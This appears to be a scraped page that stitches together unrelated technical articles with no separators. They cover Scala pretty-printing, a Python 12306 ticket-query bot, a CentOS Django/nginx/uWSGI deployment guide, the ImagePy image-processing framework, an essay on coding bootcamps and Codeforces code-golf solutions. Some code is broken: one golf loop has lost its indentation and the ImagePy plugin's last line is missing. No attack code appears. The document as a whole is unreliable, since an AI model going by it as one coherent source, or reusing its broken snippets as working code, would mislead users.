At width 32, the first Dense(...) call becomes short enough to fit on one line; at width 34 the second Dense(...) fits as well; and at width 79 the whole model = Sequential(...) expression fits on a single line.

We can also see an identical sort of progression in the pretty-printed JSON, with it starting off totally vertically expanded but taking advantage of the horizontal space to one-line parts of the JSON as we provide it a wider and wider acceptable width:

width: 0
{
    "person1": {
        "name": "Alive",
        "favoriteColors": [
            "red",
            "green",
            "blue"
        ]
    },
    "person2": {
        "name": "Bob",
        "favoriteColors": [
            "cyan",
            "magenta",
            "yellow",
            "black"
        ]
    }
}
width: 48
{
    "person1": {
        "name": "Alive",
        "favoriteColors": ["red","green","blue"]
    },
    "person2": {
        "name": "Bob",
        "favoriteColors": [
            "cyan",
            "magenta",
            "yellow",
            "black"
        ]
    }
}
width: 61
{
    "person1": {
        "name": "Alive",
        "favoriteColors": ["red","green","blue"]
    },
    "person2": {
        "name": "Bob",
        "favoriteColors": ["cyan","magenta","yellow","black"]
    }
}
width: 74
{
    "person1": {"name": "Alive","favoriteColors": ["red","green","blue"]},
    "person2": {
        "name": "Bob",
        "favoriteColors": ["cyan","magenta","yellow","black"]
    }
}
width: 84
{
    "person1": {"name": "Alive","favoriteColors": ["red","green","blue"]},
    "person2": {"name": "Bob","favoriteColors": ["cyan","magenta","yellow","black"]}
}
width: 152
{"person1": {"name": "Alive","favoriteColors": ["red","green","blue"]},"person2": {"name": "Bob","favoriteColors": ["cyan","magenta","yellow","black"]}}

You can copy-paste the code snippets above into any Scala program or the Scala REPL , and you should see the output shown above.

Analysis

Earlier, we claimed the following properties of our pretty-printing algorithm:

Peak heap usage linear in the width of the output window

The ability to start and stop the pretty-printing to print any portion of it, with total runtime linear in the portion of the structure printed

Let us look at these in turn.

Heap Usage

Our recurse function walks over the Tree structure in order to return the pretty-printed Iterator[String] . One thing of note is that the Tree nodes are "lazy": Nested contains an iterator of children, not a concrete array of children, and so at no point is the entire tree materialized at the same time.

At any point in time, the number of recurse calls on the stack is linear in the depth of the tree we're printing (if the tree is roughly balanced, that is roughly O(log n) in the total tree size). Within each of those recurse calls, we buffer up some number of chunks; however, the total number of chunks buffered by all the calls in the call stack cannot exceed the maxWidth value, since each call subtracts the width of its prefix whenever it recurses into a child.

Note that siblings in the Tree each have separate buffers, which each can be up to maxWidth in size. However, as siblings they are never active on the call stack at the same time: the first sibling's returned Iterator[String] must be exhausted before the second sibling starts evaluating, so the peak heap usage is still limited by maxWidth .

Strictly speaking, the total heap usage is O(max-width + tree-depth + biggest-literal) . This is much better than algorithms that involve materializing the entire O(size-of-tree) data structure in memory to manipulate.
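To make this concrete, here is a minimal sketch (not from the original post), assuming the Tree / Literal / Nested definitions used in the prettyprint code above, where a Nested node's children are an Iterator[Tree] that can be generated lazily:

// A hypothetical million-element "call": the children iterator is generated
// on demand, so neither the tree nor its printed form is ever fully in memory.
val huge = Nested(
  "List(",
  Iterator.tabulate(1000000)(i => Literal(i.toString)),
  ", ",
  ")"
)
// Write chunks straight to stdout as they are produced; peak heap stays around
// O(max-width + tree-depth + biggest-literal), never O(size-of-output).
prettyprint(huge, maxWidth = 80, indent = 4).foreach(print)

Because each chunk is handed to the caller as soon as it is generated, it can be written to a file or socket immediately and then discarded.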

Start-Stop, Linear Runtime

Since the output of prettyprint is an Iterator[String] , we can choose to consume as much or as little of the output as we want, resulting in a corresponding amount of computation happening. We do not need to wait for the entire pretty-printing to complete before we start receiving chunks.

Because we do not construct the entire pretty-printed output up-front, we also do not need to pay for the portions of the Tree structure that we did not print! This means that calling prettyprint on the first few lines of a huge data structure is very fast, whereas calling a .toString that materializes the whole output in memory could easily take a long time.
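For example, a small hypothetical snippet reusing the json Tree from earlier: only the chunks we take are ever computed, and the rest of the Tree is never visited.

// Take just the first 20 chunks of the pretty-printed output and stop there.
val preview = prettyprint(json, maxWidth = 40, indent = 4).take(20).mkString
println(preview)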

Conclusion

The key insight behind this prettyprint algorithm is that for this common kind of indentation-based mixed horizontal/vertical layout, you can make layout decisions in a streaming fashion with only a bounded amount of buffering:

When you need to buffer all of a child's chunks, it is only to verify that the child can fit on one line, and thus buffering everything is cheap.

When a child's output is very large, we can make that determination after buffering at most one line of chunks, so that is cheap as well.

This gives the pretty-printer very predictable runtime characteristics, and allows it to be used in a streaming fashion on very large data structures without accumulating a corresponding very-large-string in memory.

The described prettyprint algorithm is currently being used in my Scala PPrint library, though extended in a few incidental ways (colored output, infix nodes, etc.). It is also used to display values in the Ammonite Scala REPL , and I have used it to pretty-print huge data structures. Both the quality of the pretty-printed output and the convenient runtime characteristics behave exactly as described.

This blog post extracts the core pretty-printing algorithm, separates it out from all the incidental concerns, and documents it for posterity. While the initial goal was to pretty-print source-code representations of Scala data structures, this blog post demonstrates how the core pretty-printing algorithm can be applied to any hierarchical data format made up of (1) terminal nodes with a plain string representation and (2) nested nodes with a prefix, a suffix, and a list of children with separators. This means simple formats like JSON or the subset of Python shown are trivially supported, while the core algorithm can be easily extended with additional Tree subclasses to support additional syntax such as infix operators, bin-packed lists, vertically-aligned indentation, or other constructs.

About the Author: Haoyi is a software engineer, an early contributor to Scala.js , and the author of many open-source Scala tools such as the Ammonite REPL and FastParse .

If you've enjoyed this blog, or enjoyed using Haoyi's other open source libraries, please chip in (or get your Company to chip in!) via Patreon so he can continue his open-source work

Dreading the Spring Festival travel rush? Python helps you grab your train ticket home on 12306

前言

年味越来越淡,但我对过年的期待一直没变。为了理想,离开家乡。这一路,背上行囊,穿过人潮,千里迢迢。疲惫也好,激动也罢,总有家乡值得牵挂。

春节是孟浩然“昨夜斗回北,今朝岁起东”的唏嘘,不仅感叹于“田家占气候,共说此年丰”的蹉跎岁月,更多感伤于这一年下来的“无禄尚忧农”自我调侃的碌碌无为;春节是董必武“共庆新年笑语哗,红岩士女赠梅花”的对新年的期待,也有“举杯互敬屠苏酒,散席分尝胜利茶。只有精忠能报国,更无乐土可为家。”的伟大抱负。

但是,所有的乡愁和感伤,最好的解药就是一张火车票。每当万事俱备,总是只欠东风,我依然是被一张5mm厚的火车票拦在了门外。隐隐约约在我眼前出现,然后又悄无声息的走掉,说的就是你,我花钱加速都抢不到的火车票。

大学四年以接近尾声,遗憾于爱情的“你好我爱你,再见,对不起”。这种遗憾经过反复斟酌和推敲,有那么一刻,我感觉你我之间的距离就是那张“近在眼前,远在天边”可望而不可及的火车票。

由于乡愁泛滥成灾、爱情糜烂至极、友情西辞黄鹤,所以阿广今天教大家如果用python抢火车票!解决你的乡情、爱情、友情,说不定还有基情?

The data

Part of the official 12306 data looks like this:


Implementation

Note: the bot includes natural-language recognition and processing.

(1) Load the imports

from distutils.log import warn as printf
import sys
from bosonnlp import BosonNLP
import yaml
from os.path import expanduser
import os
import collections
import subprocess
import datetime

(2) Load the config file

home = expanduser("~")
with open(os.path.join(home, ".ibot.yml")) as f:
    config = yaml.load(f)
bosonnlp_token = config["token"]

(3) Parse the query string

def parse(self, query_string):
    """
    input:  1月12号济南到兖州的高铁票
    output: [{'entity': [[0, 3, 'time'], [3, 4, 'location'], [5, 6, 'location']],
              # we need to understand the pattern in which entities appear, i.e. the context
              'tag': ['t', 'm', 'q', 'ns', 'p', 'ns', 'ude', 'n', 'n'],
              'word': ['1月', '12', '号', '济南', '到', '兖州', '的', '硬座', '票']}]
    """
    result = self.nlp.ner(query_string)[0]
    words = result['word']
    tags = result['tag']
    entities = result['entity']
    return (words, entities, tags)

(4) Get a recognized entity

def get_entity(self, parsed_words, index_tuple):
    """
    Fetch a recognized entity by slicing, in the style of the filter
    recipes in the Python Cookbook.
    input:
        entities: index tuples
        parsed_words: the parsed words
    """
    return parsed_words[index_tuple[0]:index_tuple[1]]

(5) Give the tuples names

def format_entities(self, entities):
    """Name the tuple fields."""
    namedentity = collections.namedtuple('namedentity', 'index_begin index_end entity_name')
    return [namedentity(entity[0], entity[1], entity[2]) for entity in entities]

(6) Get the parsed timestamp

def get_format_time(self, time_entity):
    """
    output: {'timestamp': '2018-12-20 23:30:29', 'type': 'timestamp'}
    """
    basetime = datetime.datetime.today()
    result = self.nlp.convert_time(time_entity, basetime)
    # print(result)
    timestamp = result["timestamp"]
    return timestamp.split(" ")[0]

https://github.com/zandaoguang/MissHome

How do you call it? (The Chinese phrases below are the natural-language queries fed to the bot.)

iquery 济南 兖州 20190112
ibot 本周天从济南回老家兖州,帮我看下
ibot 本周五从兖州出发,打算去北京捡垃圾,帮我看下有没有车票
ib 这周六从南京回武夷山老家,帮我看下车票
...

Then query the results and grab the ticket.
阿广说

自从学了计算机,每逢思乡之情冉冉升起,只能通过加快敲击键盘的速度来忘记此时此刻的烽火三月、家书万金。

盼望着,盼望着,寒假来了,春天的脚步近了。在我们童颜尚驻时,过年缺少不了的部门就是走亲戚,有鱼肉之果腹,亦有无案牍之劳形。可后来的后来,我们长大了,走亲戚在无形之中成了一种“烦恼”。

我们累于东家跑西家蹿;我们累于各类繁文缛节;我们累于各式尬聊;我们累于招呼熊孩子;我们累于送礼送红包;我们累于各种解释;我们累于被明里奚落、暗里鄙视;我们累于装体面、撑面子。



明明生活不止眼前的苟且,还有往后余生的苟且,可碍于面子,我们依然装作不但有诗和远方,还要有钱途的样子。



如果把过年比作爱情,那岂是:长街长,烟花繁,你挑灯回看;短亭短,红尘辗,我把萧再叹?通俗点讲,我愿用三生烟火,换你一张通往家乡的火车票。

Deploying a Django service on CentOS with nginx and uWSGI

1. Install Python 3

yum -y install wget gcc make zlib-devel readline-devel bzip2-devel ncurses-devel sqlite-devel gdbm-devel xz-devel tk-devel openssl-devel
wget https://www.python.org/ftp/python/3.6.1/Python-3.6.1.tar.xz
xz -d Python-3.6.1.tar.xz
tar -xvf Python-3.6.1.tar
cd Python-3.6.1
./configure --prefix=/usr/local/python3.6 --enable-optimizations
make
make install
ln -s /usr/local/python3.6/bin/python3 /usr/bin/python3
ln -s /usr/local/python3.6/bin/pip3 /usr/bin/pip3

This installs Python by building it from source.

Run python3 --version and pip3 --version to verify the install.

2. Install nginx

sudo rpm -Uvh http://nginx.org/packages/centos/7/noarch/RPMS/nginx-release-centos-7-0.el7.ngx.noarch.rpm
sudo yum install -y nginx
sudo systemctl start nginx.service

Visit your domain or IP in a browser and check that nginx's default page is served.

3. Download the code and upload it to /var/www on the server

4. Install the dependencies

pip3 install django
pip3 install uwsgi
ln -s /usr/local/python3/bin/uwsgi /usr/bin/uwsgi3

5. Run the project standalone to test it

cd /var/www/dexundjango
python3 manage.py runserver 0.0.0.0:8014

Once the test passes, press Ctrl + C to stop it.

6. Configure uWSGI

sudo mkdir -p /etc/uwsgi/sites
sudo mkdir -p /var/log/uwsgi
cd /etc/uwsgi/sites
sudo vi /etc/uwsgi/sites/mysite.ini

[uwsgi]
socket = 127.0.0.1:10000
chdir=/var/www/dexundjango
module=mysite.wsgi:application
master=True
pidfile=/tmp/project-master.pid
vacuum=True
max-requests=5000
daemonize=/var/log/uwsgi/mysite.log

7. Configure nginx

vi /usr/local/nginx/conf/nginx.conf   (adjust to wherever your local nginx.conf lives)
Use find / -name uwsgi_params to locate the uwsgi_params file and substitute its path below.

server {
    listen 8014;                # port exposed to the outside
    server_name localhost;
    charset utf-8;
    location / {
        include /usr/local/nginx/conf/uwsgi_params;
        uwsgi_pass 127.0.0.1:10000;    # must match the port configured in uwsgi.ini
    }
    location /static/ {
        alias /home/www/dexundjango/trade/static/;    # static file path for the project
    }
}

8. Start uWSGI

uwsgi3 --ini /etc/uwsgi/sites/mysite.ini

9. Start uWSGI on boot

vi /etc/init.d/uwsgi

#!/bin/bash
# chkconfig: - 85 15
uwsgi=/usr/bin/uwsgi3
api_conf=/etc/uwsgi/sites/mysite.ini
case $1 in
start)
    echo -n "Starting uWsgi"
    nohup $uwsgi -i $api_conf >/var/log/uwsgi/project-api.log 2>&1 &
    echo " done"
    ;;
stop)
    echo -n "Stopping uWsgi"
    killall -9 uwsgi
    echo " done"
    ;;
restart)
    $0 stop
    $0 start
    ;;
show)
    ps -ef|grep uwsgi
    ;;
*)
    echo -n "Usage: $0 {start|restart|stop|show}"
    ;;
esac

chmod +x /etc/init.d/uwsgi
chkconfig --add uwsgi
chkconfig uwsgi on


ImagePy: an open-source Python image-processing framework with a plugin-friendly UI


Editor's note from Leiphone AI Technology Review: ImagePy is an open-source Python image-processing framework whose UI supports open plugins. Its GitHub page, https://github.com/Image-Py/imagepy , has both a detailed introduction to the software and a number of usage examples. Below, Leiphone AI Technology Review walks through this open-source image-processing framework in detail.

ImagePy is an image-processing framework built around ImageJ-style plugins; it can be combined with scipy.ndimage, scikit-image, opencv, simpleitk, mayavi and any other numpy-based library. Its home page is http://imagepy.org .



Overview

ImagePy is an open-source image-processing framework written in Python. Its UI layer, image data structure and table data structure are based on wxPython, numpy and pandas respectively. It supports any plugin based on numpy and pandas, and such plugins can easily interoperate with scipy.ndimage, scikit-image, simpleitk, opencv and other image-processing libraries.



Overview: mouse measurement, geometric transforms, filtering, segmentation, counting, etc.



If you prefer the ImageJ look, try switching via windows -> Windows Style.

ImagePy:

has a user-friendly interface;

can read and save image data in a variety of formats;

supports ROI selection, drawing, measurement and other mouse operations;

can perform image filtering, morphological operations and other routine operations;

can do image segmentation, region counting, geometric measurement and density analysis;

can run data analysis, filtering and statistical analysis on the parameters extracted from images.

The long-term goal of the project is to become a union of ImageJ and SPSS.

Paper link:

https://academic.oup.com/bioinformatics/article-abstract/34/18/3238/4989871?redirectedFrom=fulltext

Installation:

Supported systems: Windows, Linux and macOS, with Python 2.7 or Python 3 and above.

ImagePy is a wxPython-based UI framework, and on Linux it cannot be installed with pip alone; you need to download the whl file that matches your Linux distribution.

Because ImagePy writes some configuration information, you may hit permission problems on Linux and macOS, so start it with sudo. If you install with pip, add the user flag like this: pip install --user imagepy.

If you install ImagePy inside an anaconda virtual environment, you may run into an error along the lines of "this program needs access to the screen; please run it with a Framework build of Python, and only when you are logged in on the main display". If you hit this, start it with pythonw -m imagepy instead.

基本操作:

ImagePy 有一组非常丰富的特性,在这里,我们使用一个具体的示例向你展示 ImagePy 的这些特性。我们选择官方使用 scikit-image 来分割硬币的例子,因为这个例子简单而全面。

打开图像

菜单打开:file -> local samples -> coins,来打开 ImagePy 中的示例图像。ps:ImagePy 支持 bmp、jpg、png、gif、tif 和其他常用的文件格式。通过安装 ITK 插件,还可以读取/保存 dicom、nii 和其他格式的医学图像。如果安装了 opencv,还可以读/写 wmv、avi 和其他格式的视频。



硬币

过滤与分割

选择一个复合滤波器对图像进行 sobel 梯度提取,然后使用上下阈值作为标记,最后在梯度图上进行 watersheds 分割。滤波和分割是图像处理工具包中的关键技术,也是最终测量成败的关键。还支持诸如自适应阈值、watersheds 等分割方法。



Up And Down Watershed 分割



掩模

二值化

菜单打开:process -> binary -> binary fill holes

分割后得到的掩模图像比较干净,但仍存在一些空洞和杂质,干扰了计数和测量。ImagePy 支持二进制操作,如腐蚀、膨胀、开环和闭环,以及轮廓提取、中心轴提取和距离转换。



填洞

几何滤波

菜单打开:analysis -> region analysis -> geometry filter

ImagePy 可以根据面积、周长、拓扑、稳定性和离心率等参数进行几何滤波。还可以使用多个条件进行筛选。每个数字可以是正的(或者负的),这表示所保存的对象的相应参数分别大于(或者小于)相对值。保存的对象将被设置为前色,拒绝的对象将被设置为背景色。在这个演示中,背景颜色设置为 100,以便查看有哪些对象被过滤掉了。一旦对结果满意,就将背景色设置为 0。此外,ImagePy 还支持灰度密度滤波、颜色滤波、颜色聚类等功能。



几何滤波

几何分析

菜单打开:process -> region analysis -> geometry analysis count,计算面积并分析参数。通过选择 cov 选项,ImagePy 使用通过协方差计算的椭圆拟合每个区域。这里计算前面步骤中所示的参数,如面积、周长、离心率和稳定性。事实上,前一步的滤波正是对这一步的准备。



几何分析



生成结果表(背景是黑色,以强调椭圆)

按区域对表进行排序

菜单打开:table -> statistic -> table sort by key

选择主键作为区域,并选择 descend,表将按面积的降序排序。表是除了图像之外的另一项重要数据。从某种意义上来说,很多时候我们需要获得图像的相关信息,然后以表的形式对数据进行后续处理。ImagePy 支持表 I/O(xls、xlsx、csv)、过滤、切片、统计分析、排序等等(右键单击列标题来设置文本颜色、小数精度、行样式等)。



图表

菜单打开:table -> chart -> hist chart

我们经常需要利用表格数据来绘制一个图表。这里,我们绘制了某个区域和其周边列的直方图。ImagePy 的表可以用于绘制常见的图表,如柱状图、饼图、直方图和散点图(基于 matplotlib)。该图表带有缩放、移动和其他功能,并可以保存为图像。



直方图

3D 表格

菜单打开:kit3d -> viewer 3d -> 2d surface

图像的表面重建。这幅图像显示了三种方式的重建结果,包括:sobel 梯度图、高阈值和低阈值。它显示了 Up And Down Watershed 是如何工作的:

计算梯度;

通过高低阈值标记硬币和背景;

在 dem 图表上模拟上升 water 来形成分割线。

ImagePy 可以完成图像的 3d 滤波、3d 轮廓构建、3d 拓扑分析、2d 表面重建和 3d 表面可视化。3d 视图可以被自由拖动、旋转,其结果可以保存为.stl 文件。



3d 可视化

宏记录和执行

菜单打开:window -> develop tool suite

宏记录器显示在开发工具面板中。我们已经手动完成了一个图像的分割。然而,用这种方式一下子处理超过 10 幅图像是非常乏味的。因此,假设在处理这些问题的时候,这些步骤具有高度的可重复性和健壮性,我们可以记录一个宏,以便将几个处理过程组合成一个单击程序。宏记录器与无线电记录器相似。打开后,它将记录操作的每个步骤。我们可以点击暂停按钮停止录制,也可以点击播放按钮开始录制。当宏运行时,所记录的命令将按照顺序执行,因此它具有简单性和可再现性。

宏被保存到 .mc 文件中。将文件拖放到 ImagePy 底部的状态栏中,宏将自动执行。我们还可以将 .mc 文件复制到 ImagePy 文件目录下的菜单的子菜单中。当启动 ImagePy 时,宏文件将被解析为相应位置的菜单项。通过单击菜单,宏将被执行。



宏记录

Workflow

宏是一系列预定义的命令。通过将一系列固定操作记录到宏中,可以提高工作效率。然而,宏缺乏灵活性。例如,有时主要步骤是固定的,但是参数调优需要人工参与。在这种情况下,workflow 就可以解决这个问题。ImagePy 中的 workflow 是可视化的流程图,分为两个层次:章节和部分。本章对应于 workflow 中的矩形区域,并且该部分是矩形区域中的按钮,也是命令,并附有图形说明。右边的消息窗口将显示相应的功能描述,同时鼠标悬停在上面。单击右上角的“详细文档”,查看整个过程的说明文档。

workflow 实际上是用 MarkDown(一种标记语言)编写的,但是在编写时你需要遵守以下规范:

Title
===== ## Chapter1 1.

Section1

some coment for section1 ...

2. ...

## Chapter 2 ...


workflow

Filter plugins

In the previous sections we introduced macros and workflows, which make it convenient to wire together existing features. Sometimes, though, we need to create a new feature. In this section we will try adding a new feature to ImagePy. ImagePy can easily call any numpy-based function; let's take scikit-image's canny operator as an example.

The example code is as follows:

from skimage import feature
from imagepy.core.engine import Filter

class Plugin(Filter):
    title = 'Canny'
    note = ['all', 'auto_msk', 'auto_snap', 'preview']
    para = {'sigma': 1.0, 'low_threshold': 10, 'high_threshold': 20}
    view = [(float, 'sigma', (0, 10), 1, 'sigma', 'pix'),
            ('slide', 'low_threshold', (0, 50), 4, 'low_threshold'),
            ('slide', 'high_threshold', (0, 50), 4, 'high_threshold')]

    def run(self, ips, snap, img, para=None):
        # The last line was cut off in the source article; presumably it feeds
        # the three parameters declared above into scikit-image's canny, roughly:
        return feature.canny(snap, para['sigma'], para['low_threshold'],
                             para['high_threshold']) * 255

You can't build an iPhone with Python alone


python正成为计算机领域的红人,它的走红不仅仅因为它的简易语言设计和各种方便的调用包,还与各种培训课程中的营销般的吹捧不无关系。

在这些热文的叙述中,似乎学会Python,就能搞定一切计算机难题了。对于这种普及类编程工具和课程,今天的文章可能可以带来一些不一样的看法。

这篇文章的作者Bhavya Kashyap在计算机领域可算是“老司机”,其目前在亚马逊做开发相关的工作,之前雇主是微软以及Facebook。接下来Bhavya Kashyap用她多年的工作经验告诉你,为什么她不喜欢Python和相关培训班,毕竟,iPhone可不是只靠python就造的出来的。

以下,enjoy。

最近我的一位朋友给我讲述了她与一位同事的故事。她的同事是一个好好先生,认识之后,每天都在给她强烈安利编程训练营,称其为工程领域一种新的学位。他自己本来也是编程训练营的获利者,就他所说,这份工作就是自己编程培训的成果,他认为为了计算机去拿一个学位这个事情是多余的。

我的朋友就读于滑铁卢大学的计算机工程专业、并且获得了多伦多大学的工程硕士学位,她对此显然非常不服。

经过一番思考后,我朋友试图改变他的想法,她详细询问了相关编程训练营是否涉及安全、服务器硬件资源或操作系统相关学习,并试图解释:编程培训班和专业学位学习的区别到底是什么。

编程训练营及其所传递的信息

根据对于编程训练营毕业生的观察,我发现他们有一种荒谬的结论,其中之一就是他们相信web开发和app开发就是整个计算机工程领域的内容。


编程训练营所教的语言和技能组合

这并不意外。目前的现实就是这样,编码正在成为Web开发的代名词。这个同等性在一些零基础编程训练营,甚至在《纽约时报》等高频出版物中看到。

编程行业正在迅速扩张,但SaaS、设备、安全、系统工程(生产自动驾驶汽车梦寐以求的技术),甚至游戏开发等领域都存在人才匮乏的情况。这极具讽刺意味。从理论上讲,编程训练营是将非技术工人转变为技术工人的一种方式,并且创造熟练劳动力的廉价渠道。工人们纷纷涌向这些训练营,但结果是工人们都偏向于web开发,而计算机科学领域则需要从其他领域努力寻找技术人才。

有人可能会说主动型人才早已明白24周的菜鸟训练营能教给你的只有那么多,但是他们自己知道自己未来的方向和他们的才能所在。但流量是非常必要的,特别是当这种现象如此普遍时。毕竟,流量使得这样的训练营如此畅销。

编程训练营当然是有价值的。对于那些没有能力接受技术教育的人来说,这是他们进入技术领域的一种渠道。对于那些意识到自己太晚加入,甚至只是想多赚一点钱的人来说,也是如此。对于web和移动端开发的诱惑力和即时满足感是可以理解的,尤其是在当前环境下,下载框架和文本编辑器成本很低,却很可能获得大量奖励。这些训练营的美妙之处在于它们可以成为其他类型的开发,工程甚至学术计算机科学的门户。

但是,我只是不知道新学员需要花多久才能进入那些领域。



编程不等同于计算机科学,也不等同于软件工程或计算机工程,更不等同于STEM(科学、技术、工程和数学的英文首字母缩写)。

虽然它现在很火,已近乎成为计算机科学的代名词。但如果你是一个计算机科学毕业生,你应该知道这两者是不同的,也知道这种等同性对两个学科都是一种伤害。如果你不是从事这方面工作,你可能会想这两者有什么区别。其实这两者的差别不仅在于其所需技能的不同,还在于其根本目标就是不一样的,当然两者也有重合的部分。

编程是战术性的。它是解决眼前问题的过程,并构建某些东西以使其发挥作用。而软件工程则是在此基础上引入战略思维,并应用工程技术,来构建强大且可持续的解决方案。计算机工程包括一定程度的软件工程,但也包含硬件即制作平板电脑、手机和控制台所需的材料。最后,还有计算机科学,在某种程度上,这是最具哲学性的学科,因为其中包括深入研究数学,以及为什么不同类型的算法,数据结构和计算方法的工作方式却相同。

虽然编程训练营对很多人来说是合适的解决方案,但是正规的计算机科学项目所教授的技能和思维模式对于推动技术发展至关重要。这就是为什么从训练营毕业的学生很少有人进入大型科技公司。

需要有能力为公众提供服务,如Google Maps或Waze,它们使用的是 Dijkstra 等算法和MongoDB或Android SDK等工具,他们的用户不可避免地包括编程训练营的参与者。虽然许多菜鸟训练营确实会涉及算法和数据结构,但是它们所覆盖的深度和广度都不够。而且训练营通常是以面试为目的来教授这些,所以教学内容差异很大。


最好的雇主

对计算机科学专业人员的需求一直在快速增长,并且没有任何消退的迹象。根据Cod.org官方网站收集的数据,全美国范围内开放了570,926 个计算机相关岗位。然而,去年美国国内的计算机科学毕业生人数仅为49,291 。

根据美国劳工统计局的数据, 2016年至2026年间 ,计算机和信息技术的总体就业率预计将增长 13% 。即使计算机科学的毕业率的增长速度能达到同样的比例,绝对数字也必须增加一个完整的数量级才能赶上。 最近的趋势表明有越来越多的学生正在参加计算机科学项目,但仍然不够,还需要做更多工作来缩小差距。

值得庆幸的是, 在过去几年里,越来越多的人注意到了计算机科学(CS)教育的重要性。这很鼓舞人心,但是依然存在类似的问题。

从大多数编程网站的内容来看,人们对“CS”和“STEM”这两个术语的概念产生了混淆。

甚至连computerscience.org官方网站都混淆了这两个术语。网站有一篇文章的标题为“为什么越来越多的女性不愿意从事计算机科学?”文章中表明只有 12% 的工程师为女性。


至于是哪一种工程师的12%并未说明?

后来工程领域发布的数据则显示女性从业者占“计算机科学相关专业”的25%。但是为什么在专门讨论计算机科学的问题时要突出来自工程领域的数据, 从而混淆事实呢?对专业知识不了解的人来说,这会让他们认为某些术语的意思是一样的。

将CS定位为STEM最具代表性的行业,会把那些想探索这个行业的人引向一个狭窄的领域,这意味着其他的领域会失去很多新员工。当涉及到低级API或系统工程设计等方面,你会惊讶地发现它们是多么具有挑战性。总线设计需要电气工程知识,闪存开发(例如闪存驱动器和手机存储)需要材料科学的知识。我们不要忘记像底盘/外观设计这样的领域,需要工业工程师和设计师来创建像Surfaces,Xboxes和Pixel 3s这样美丽而时尚的外观。一些科技工作者在交流中, 这些话题几乎完全被忽略。

包括我在内的许多专业工程师,都对人们现在高度专注于那些偏向于更高层次的客户端编程的训练营和 CS项目感到不安。这个趋势让人们只关注到了科技的一部分领域,这个行业需要对工程有更深入了解的人, 这样我们周围的空缺才能被填补。如果年轻的大学生甚至是年长的技术人士都不了解它们的可能性,他们就会选择技术阻力最小的那条道路。最终, 工程人才将失去对核心软件工程、土木、机械、网络还有应用程序开发的关注。

向小群体展现STEM梦想

这也是少数人群组织的想法,例如:Women Who Code,Girls Who Code,Black Girls Code等。 这些以少数群体为重点的组织,无论是否无意,都传播了编程为STEM的观点。 他们支持将女性带入科学和工程领域,这种说法之所以成立,只是因为公众对这些领域的看法又被缩小到了代码范围。



在这种背景下,大部分组织的举措主要就是教授他们脚本和功能性语言。其实对年轻人来说,能大致领略C 和 C++等语言, 这是非常有价值的, 这样能让他们觉得编程语言不是那么的难。冒充者综合症是导致追求 CS学位的少数群体辍学的一个真正因素,所以需要为他们提供帮助来消化这些更难的编程语言, 而将这些编程语言纳入所有CS课程, 可以增强他们学习的信心。

有趣的是,这里我们又说回到了编程训练营,越来越多的少数群体者加入去提升自己的能力,弥补自己的不足。Facebook的广告不断宣传这些举措,这些举措的领导者非常认真的(也许是真诚的)对待学员,但是编程训练营对学员而言最终只起到了非常微弱的作用。这些举措的直接结果尚不清楚――并非所有训练营都公布了学员的就业率,即使他们公布了,某些人也会认为这些举措具有误导性。

显然,除了编程之外,还缺乏很多专业技能训练营,这是因为需要这些技能的公司并没有给训练营助资。

本着乐观的精神,我将假定学员就业率确实很高,训练营的毕业生在离开训练营几个月后就能在初创公司或中型公司找到工作。然后凭借几年的经验,一些人能够跳槽到像谷歌或亚马逊这样的巨头公司中。

但这些少数群体毕业生中的大部分最终并没有担任领导职务, 尤其是在上述巨头公司中。训练营在大部分人的印象中已经与能力弱画上等号,拥有训练营证书的人有时甚至会被剥夺参加某些MFAANG面试的资格(MFAANG是Microsoft, Facebook, Amazon, Apple, Netflix和Google.的缩写)。

我听说同行们在简历上对拥有这类证书的少数群体候选人的资历提出了激烈的质疑。不幸的是, 这就是目前的状况。因此,只有拿到正式的STEM学位,少数群体人才的实力才能得到正视。当然,如何才能得到STEM学位又要另外花费一番功夫了。


Techgirlz涵盖了应用工程和理论工程

向少数群体引入CS是第一步,同时我们也需要让工程学科多样化。无论在大公司还是小公司中,在所有的领域中,我们都需要妇女、有色人种和其他少数群体的加入。这不仅仅能提高行业水平,为顾客带来好的产品,这也是增强社会和社会经济能力的一个步骤。

下一步应该如何?

我已经表明了我的忧虑,但问题都没有解决。负责教授给学员所有可能会用到的知识是谁的职责呢?

显然,除了编程之外,还缺乏很多专业技能训练营,这是因为需要这些技能的公司并没有为训练营提供资金支持。虽然编程训练营和一般CS项目举措是这个教育计划的一部分,实际上它们已经做了很多工作,为很多人打开了大门。他们没有义务扩大学员的知识基础去涵盖所有的专业领域,虽然他们这样做也是应该的。

我的结论仍是, 信息传递很重要。

作为一个行业, 我们不能继续只重视Web/app开发和高级CS。我们应当做得更好, 以便满足对科学、技术和工程角色的需求。我们需要新的人才来设计操作系统、主板、相机、屏幕、机箱、装配线和服务器来推动行业技术的更新。毕竟, 你不能仅仅用 Python就做出一部 iPhone。

相关报道: https://medium.com/s/story/you-cant-build-an-iphone-with-python-ad690e5b2164


codeforces April fool contest 2018


Note: the topic of this post is code-golf (i.e. writing the shortest code possible), and the language used is Python 2. This post contains spoilers for the CF April Fools Contest 2018.

(除草。。还没更完,看心情更。。

B. A Map of the Cat

python3好像不用flush,所以用了python3。第一发107B,只排到了第四

i=0;exec("print(i);i+=1;x=input()\nif x!='no':print('grumpy'if x[-2:]in'lenuseay'else'normal');quit()\n"*7)

好像换了个写法之后少了3B,但还是第四>_>

i=0;
while 1:
print(i);i+=1;x=input()[-2:]
if x!='no':print(['normal','grumpy'][x in'lenuseay']);break 发现了一个全新的写法: [print(i)or input()==xxx for i in range(6)] ,只有87B了。。怎么还是第四?前何怪? print(['normal','grumpy'][any([print(i)or input()[-2:]in'lenuseay'for i in range(6)])])

接着又砍了两个字节( lenuseay 中的 ay )。。

print(['normal','grumpy'][any([print(i)or input()[-2:]in'lenuse'for i in range(6)])])

发现排到第三了。。就把第四打开看了一下。。

卧槽他怎么只询问了9啊。。?!

好像是因为数据中9回答no的都是normal。。

行吧行吧。。

print(9);print(['normal','grumpy'][input()[-2:]in'lenuseay'])

轻松第一啊?

C. Ravioli Sort

显然判断初始数列中相邻数的差是不是不超过$1$即可

n=input();l=map(int,raw_input().split());print["YES","NO"][any([1 for i in range(n-1)if abs(l[i]-l[i+1])>1])]

110B居然能拿python第一,全cf第二?(注:提交的版本是110B,上面版本是109B

学了 zip ,但是 max 不接受空列表,所以下面的代码在$n=1$时gg了

input();l=map(int,raw_input().split());print["YES","NO"][max([abs(x-y)for x,y in zip(l[1:],l[:-1])])>1]

但不需要$n$还是可以省一个字节

input();l=map(int,raw_input().split());print["YES","NO"][any([1 for x,y in zip(l[1:],l[:-1])if abs(x-y)>1])]

好像 zip 不需要两个list的长度相同

